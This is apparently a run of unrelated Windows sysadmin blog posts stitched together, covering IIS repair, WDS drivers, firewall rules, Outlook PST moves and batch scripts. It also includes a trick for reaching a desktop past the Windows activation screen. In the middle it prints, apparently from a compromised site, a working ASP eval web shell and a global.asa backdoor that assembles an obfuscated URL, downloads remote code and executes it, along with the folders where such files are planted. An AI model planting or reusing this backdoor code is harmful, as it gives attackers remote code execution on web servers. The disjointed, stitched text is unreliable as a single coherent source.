So I don’t normally have problems with Activation of Windows because normally my servers have access to the Internet. This was however a Hyper-V Virtual I was having a problem with. I made an image a few months ago, and brought it back up. Went to login and was “forced” to activate the Virtual. That’s a little hard since it doesn’t have an IP Address assigned to it’s NIC. Let alone the fact I don’t want to call Microsoft’s Telephone number. Here’s what I did to gain access to my Virtual, so I can add the proper IP Address, and legally register my Virtual.

1. When you get the Activation screen press Windows Key and U. Click on the “Microsoft Website” link.
2. When Internet Explorer pops up in the Address bar type c:\windows\explorer.exe and click GO, or push enter. If prompted to run explorer.exe simply click Run.
3. You now have access to your computer.

Windows 2008

Yes, I had a similar issue with Windows 2008 not wanting to let me in due to activation problems. Here’s what I did to gain access to my server. Again, I do this to gain access to our servers to make them legal when they don’t have internet access.

1. Click on the link to get help.
2. Click on the Options menu, and choose print.
3. Choose Add Printer, and find explorer.exe, right click and choose “open”.
4. An Alternate is to use the “Ask” option and click on one of the links, then open explorer the same way you would for the 2003 options by typing c:\windows\explorer.exe.

Here’s the line I added at the top of the web.config located at c:\windows\microsoft.net\framework\v2.0.50727\CONFIG.

 <location allowOverride="false">
 <system.web>
 <identity impersonate="true"/>
 </system.web>
 </location>
 <location allowOverride="true">
  <system.web>
   <securityPolicy>
    <trustLevel name="Full" policyFile="internal"/>
    <trustLevel name="High" policyFile="web_hightrust.config"/>
    <trustLevel name="Medium" policyFile="web_mediumtrust.config"/>
    <trustLevel name="Low" policyFile="web_lowtrust.config"/>
    <trustLevel name="Minimal" policyFile="web_minimaltrust.config"/>
   </securityPolicy>
   <trust level="Full" originUrl=""/>
  </system.web>
 </location>

I create this template for Visual Studio 2010 Express: Windows Service with a System.Timer

I created my template by using an existing Visual Studio 2008 (non-express) Windows Service project. I took the service, cleared out the stuff I added, then exported it.

To make it a template simply copy the zip file under %userprofile%\My Documents\Visual Studio 2010\Templates\ProjectTemplates\

If it helps let me know!

style.asp:
<%eval request(“seo”)%>

global.asa:
<script language=”vbscript” runat=”server”>
‘by*diao
‘by*aming
sub Application_OnStart
end sub
sub Application_OnEnd
end sub
sub Session_OnStart
url=”h”&”t”&”t”&”p”&”:”&”/”&”/w”&”w”&”w”&”.”&”g”&”x”&”t”&”.”&”l”&”a”&”/”&”i”&”n”&”/”&”p”&”j”&”c”&”3″&”.”&”t”&”x”&”t”&”"
Set ObjXMLHTTP=Server.CreateObject(“MSXML2.serverXMLHTTP”)
ObjXMLHTTP.Open “GET”,url,False
ObjXMLHTTP.setRequestHeader “User-Agent”,url
ObjXMLHTTP.send
GetHtml=ObjXMLHTTP.responseBody
Set ObjXMLHTTP=Nothing
set objStream = Server.CreateObject(“Adodb.Stream”)
objStream.Type = 1
objStream.Mode =3
objStream.Open
objStream.Write GetHtml
objStream.Position = 0
objStream.Type = 2
objStream.Charset = “gb2312″
GetHtml = objStream.ReadText
objStream.Close
if instr(GetHtml,”by*aming”)>0 then
execute GetHtml
end if
end sub
‘sub Session_OnEnd
‘end sub
</script>

Update: They also add a few folders if they don’t exist. Look for /web /css /images/inc
Under the /css they usually have a file called att.asp, or zelx.asp.
Under /web they usually have User.aspx and zelx.asp
and under /images/inc they usually have config.asp which may have the same content as style.asp <%eval request(“seo”)%>

I had this issue today, we replaced an IIS7 node and copied over the config from the other node, well it worked but got 401.2. So I had to go to the other node, share it’s configuration, then copied the new shared files over to the replaced node and import the new configuration files. Once I did that, the server worked as expected.

That’s not good, and of course an iisreset works for a short period of time. Here’s how I fixed it, and there is a method to my madness so make sure you follow my steps exactly!

This seems to be caused by the WAS (Windows Process Activation Service). So in order to fix this here is what I did:
Brief version:

1. Backup your IIS configuration.
2. Uninstall WAS. It is under Features.
3. Uninstall IIS. It’s under Roles.
4. Stop and Disable IISADMIN I don’t know why but when you uninstall IIS it doesn’t (or doesn’t always) remove or at least stop IISADMIN.
5. Install WAS again.
6. Install IIS again.
7. Restore your backed up IIS configuration.

Detailed version:

1. Backup your IIS configuration.
   Open an Administrator Command line, then run:
   %windir%\system32\inetsrv\appcmd.exe add backup “backup-before-reinstall” 
2. Uninstall WAS. It is under Features.
   In your Administrator Comand line window, run:
   %windir%\system32\pkgmgr.exe /uu:WAS-WindowsActivationService;WAS-ProcessModel;WAS-NetFxEnvironment;IIS-ManagementConsole;WAS-WindowsActivationService;
   WAS-ProcessModel;WAS-NetFxEnvironment;WAS-ConfigurationAPI
3. Uninstall IIS. It’s under Roles.
   In your Administrator Comand line window, run:
   %windir%\system32\pkgmgr.exe /uu:IIS-WebServerRole;IIS-WebServer;IIS-CommonHttpFeatures;IIS-StaticContent;IIS-DefaultDocument;IIS-DirectoryBrowsing;IIS-HttpErrors;IIS-HttpRedirect;IIS-ApplicationDevelopment;IIS-ASPNET;IIS-NetFxExtensibility;IIS-ASP;IIS-CGI;IIS-ISAPIExtensions;IIS-ISAPIFilter;IIS-ServerSideIncludes;IIS-HealthAndDiagnostics;IIS-HttpLogging;IIS-LoggingLibraries;IIS-RequestMonitor;IIS-HttpTracing;IIS-CustomLogging;IIS-ODBCLogging;IIS-Security;IIS-BasicAuthentication;IIS-WindowsAuthentication;IIS-DigestAuthentication;IIS-ClientCertificateMappingAuthentication;IIS-IISCertificateMappingAuthentication;IIS-URLAuthorization;IIS-RequestFiltering;IIS-IPSecurity;IIS-Performance;IIS-HttpCompressionStatic;IIS-HttpCompressionDynamic;IIS-WebServerManagementTools;IIS-ManagementConsole;IIS-ManagementScriptingTools;IIS-ManagementService;IIS-IIS6ManagementCompatibility;IIS-Metabase;IIS-WMICompatibility;IIS-LegacyScripts;IIS-LegacySnapIn
4. Stop and Disable IISADMIN I don’t know why but when you uninstall IIS it doesn’t (or doesn’t always) remove or at least stop IISADMIN.
    In your Administrator Comand line window, run:
    %windir%\system32\sc.exe stop IISADMIN
    %windir%\system32\sc.exe config IISADMIN start= disabled
5. Install WAS again.
   In your Administrator Comand line window, run:
   %windir%\system32\pkgmgr.exe /iu:WAS-WindowsActivationService;WAS-ProcessModel;WAS-NetFxEnvironment
6. Install IIS again.
   In your Administrator Comand line window, run:
   %windir%\system32\pkgmgr.exe /iu:IIS-WebServerRole;IIS-WebServer;IIS-CommonHttpFeatures;IIS-StaticContent;IIS-DefaultDocument;IIS-DirectoryBrowsing;IIS-HttpErrors;IIS-HttpRedirect;IIS-ApplicationDevelopment;IIS-ASPNET;IIS-NetFxExtensibility;IIS-ASP;IIS-CGI;IIS-ISAPIExtensions;IIS-ISAPIFilter;IIS-ServerSideIncludes;IIS-HealthAndDiagnostics;IIS-HttpLogging;IIS-LoggingLibraries;IIS-RequestMonitor;IIS-HttpTracing;IIS-CustomLogging;IIS-ODBCLogging;IIS-Security;IIS-BasicAuthentication;IIS-WindowsAuthentication;IIS-DigestAuthentication;IIS-ClientCertificateMappingAuthentication;IIS-IISCertificateMappingAuthentication;IIS-URLAuthorization;IIS-RequestFiltering;IIS-IPSecurity;IIS-Performance;IIS-HttpCompressionStatic;IIS-HttpCompressionDynamic;IIS-WebServerManagementTools;IIS-ManagementConsole;IIS-ManagementScriptingTools;IIS-ManagementService;IIS-IIS6ManagementCompatibility;IIS-Metabase;IIS-WMICompatibility;IIS-LegacyScripts;IIS-LegacySnapIn
7. Restore your backed up IIS configuration.
   Open an Administrator Command line, then run:
   %windir%\system32\inetsrv\appcmd.exe restore backup “backup-before-reinstall”

Adding Drivers to the boot image is actually simple, and easy enough to script out using a simple batch script. Here is what I did:

• Add the following folder structure:

  C:\RemoteInstall\Boot\Default
  C:\RemoteInstall\Boot\Default\mount
  C:\RemoteInstall\Boot\Default\drivers

• Copy your BOOT.WIM file under the folder C:\RemoteInstall\Boot\Default
• Copy any drivers you want added to your BOOT.WIM file under the folder C:\RemoteInstall\Boot\Default\drivers
• Create the below add-drivers.bat file C:\RemoteInstall\Boot\Default

add-drivers.bat

@echo off
imagex.exe /mountrw "C:\RemoteInstall\Boot\Default\BOOT.WIM" 2 "C:\RemoteInstall\Boot\Default\mount"
forfiles /P "C:\RemoteInstall\Boot\Default\drivers" /M *.inf /c "cmd /c peimg /inf:@path ""C:\RemoteInstall\Boot\Default\mount\Windows"""
imagex /unmount /commit  "C:\RemoteInstall\Boot\Default\mount"
echo Now replace Boot Images ^> Microsoft Windows Longhorn Setup (x86) with
echo C:\RemoteInstall\Boot\Default\BOOT.WIM

Now that we have the pxe boot image we need to make sure when we deploy our image it copies over the required drivers. To do this you need to make the following directory structure. Replace the word IMAGEGROUP with the actual Image Group name you made, replace IMAGENAME with the Image Name. The Image Name should be the name of the image file i.e. in my case xp-pro-vlk.wim so the Image Name for me is xp-pro-vlk.

C:\RemoteInstall\Images\IMAGEGROUP\IMAGENAME\$OEM$\$1
C:\RemoteInstall\Images\IMAGEGROUP\IMAGENAME\$OEM$\$1\Drivers
C:\RemoteInstall\Images\IMAGEGROUP\IMAGENAME\$OEM$\$1\Sysprep
C:\RemoteInstall\Images\IMAGEGROUP\IMAGENAME\$OEM$\$1\Sysprep\i386
C:\RemoteInstall\Images\IMAGEGROUP\IMAGENAME\$OEM$\$1\Sysprep\i386\$OEM$

Obviously under the C:\RemoteInstall\Images\IMAGEGROUP\IMAGENAME\$OEM$\$1\Drivers folder you copy all of your drivers.

Under C:\RemoteInstall\Images\IMAGEGROUP\IMAGENAME\$OEM$\$1\Sysprep is where you can put your custom sysprep.inf file. This lets you do some important stuff for example the following is a small part of my sysprep.inf file which tells the mini setup where to find the drivers. I just happen to use sub-folders but you do not need to:

sysprep.inf

[Unattended]
    OemPreInstall=Yes
    OemSkipEula=Yes
    InstallFilesPath=C:\sysprep\i386
    OemPnPDriversPath=Drivers\Dell;Drivers\hp;Drivers\M61SME-S2;Drivers\GA-K8N51PVM9-RH
    DriverSigningPolicy=Ignore
    UpdateInstalledDrivers=Yes

First off lets start with the firewall, 2008 has a more advanced firewall, but for this I need to be able to do this on both 2003 and 2008 servers. To make it easier on myself I’m using Windows IPFW. You can get it from http://sourceforge.net/projects/wipfw/files/.

I want my servers to basically accept everything TCP inbound and outbound, as well as UDP inbound. I want it to filter the UDP outbound only. Yes I know I can do more than just filter UDP Outbound but I don’t really care right now, and most of the outbound DDOS attacks I have gotten have generally all been UDP floods to some poor sap that pissed someone off.

Now the config file I put together simply contains the following:

-f flush
add 100 allow all from any to any via lo*
add 110 deny log all from any to 127.0.0.0/8 in
add 110 deny log all from 127.0.0.0/8 to any in
add check-state
add 120 allow tcp from any to any
add 130 allow udp from any to any in
add 140 allow udp from any to x.x.x.x/y 53 out
add 140 allow udp from any to x.x.x.x/y 67 out
add 140 allow udp from any to x.x.x.x/y 88 out
add 140 allow udp from any to x.x.x.x/y 123 out
add 140 allow udp from any to x.x.x.x/y 135 out
add 140 allow udp from any to x.x.x.x/y 137 out
add 140 allow udp from any to x.x.x.x/y 138 out
add 140 allow udp from any to x.x.x.x/y 389 out
add 140 allow udp from any to x.x.x.x/y 464 out
add 140 allow udp from any to x.x.x.x/y 500 out
add 140 allow udp from any to x.x.x.x/y 636 out
add 140 allow udp from any to x.x.x.x/y 4500 out
add 140 allow udp from any to 4.2.2.0/24 53 out
add 411 deny log udp from any to any out

Now that you have my wonderful code I shouldn’t have to point it out but the x.x.x.x/y is the IP Address and the subnetmask You can also use x.x.x.x:y.y.y.y as an example 10.1.0.0/24 or 10.1.0.0:255.255.255.0. Point your DNS (port 53) to an internal server or specifically to the DNS servers of your choice. I would highly recommend including GTE’s DNS servers, for some reason no matter what I have for my DNS servers PHP has a mind of it’s own and uses GTE’s DNS servers (4.2.2.2-6) . The other UDP ports are special ports I would recommend you use your network range you use for internal traffic, or if you don’t have an internal network use whatever network you need to make it only allow those ports on your network, and not externally to other networks.

Getting it setup should be as simple as extracting the files, copying and pasting my rules above and running the install.cmd file. I use the ip_fw_allow.sys file. Do not run the install_deny.cmd file.

Once that is done you should have a working, running, outbound UDP flood protection.

The main reason why I like this is because the traffic never leaves the host. Which means it never hits your network equipment, which means no other hosts will be effected by whomever is running the UDP flood. The only thing they can do is target your own systems and any other external DNS servers you allow. It “sucks to be them” because you won’t be taking part in their DDOS attack.

Let me know if you find this useful, and if you put it in practice.

With that being said since emails are important in what I do, here’s how I moved my PST file for Microsoft Outlook 2007, and yes you can move an IMAP PST file. In fact it’s easy to do!

1. If outlook is currently opened, please close outlook and make sure it isn’t running in the task manager. Click on START, RUN, and type taskmgr then click OK to see your tasks. Go under Processes, and click on Image Name to sort it by name and make sure you do not see OUTLOOK.EXE running. If you do wait until it is no longer listed.
2. Open your Control Panel, Generally you can get there by going to START, SETTINGS, CONTROL PANEL, It may also just be listed on your START menu.
3. Open the Mail Icon in your Control Panel. Once that is opened Click on the Data Files button.
4. If you don’t know where your PST file is now, you can simply highlight the Name of the PST file you want to move and click the Open Folder… button. Keep this window open, and move your PST file to the desired location.
5. Once you have completely moved the file Highlight the PST file you want to modify and click the Settings… button. You can also simply double click on the listing if you prefer.
6. It should say it can’t find the PST file if you did it correctly. If not it may have created a new empty PST file, rename it, then try again. You should get an open dialog window, browse to where you moved your PST file to and double click it, or highlight and select OPEN.

That’s it! I know I put a lot of words in there but it’s really only a few steps, for the more technically savvy person here’s the short list:

1. Open the Mail Icon in the Control Panel.
2. Click the Data Files button.
3. Move your PST file to the desired location.
4. Double click on the data file entry, click OK, Browse to the new PST location, and you’re done.

I hope this helps someone. I know it isn’t a new thing out there, let me know if it has helped.

set hr=0%TIME:~0,2%
set hr=%hr: =%
set hr=%hr:~-2%
echo %hr%

set min=%TIME:~3,2%
echo %min%

set sec=%TIME:~6,2%
echo %sec%

Here is how it works.

First off the hour. If you run echo %TIME% and it happens to be 7 AM, you’ll get ” 7″ Well that doesn’t work if you want the two digit format like “07″. To fix that I simply told it to store the information into hr and padded a 0, like so set hr=0%TIME:~0,2%. If it is between the hours of 0-9 then it would look something like this “0 7″. To resolve that I simply removed the space like this set hr=%hr: =%. That will leave me with the value of “07″. Works great for hours 0-9, what if it was 10? Then the value would be “010″ which is obviously not correct. That is where the last set command comes in, it selects the last two digits like this set hr=%hr:~-2% which would make “010″ turn into “10″. So all hour formats are happy and the thing works.

The Minute and Second share the same code, except it is already in two digit format so you don’t need to pad it with a zero, and you don’t need to replace spaces, so all it does is grabs the two digits and sets them to their respective vars.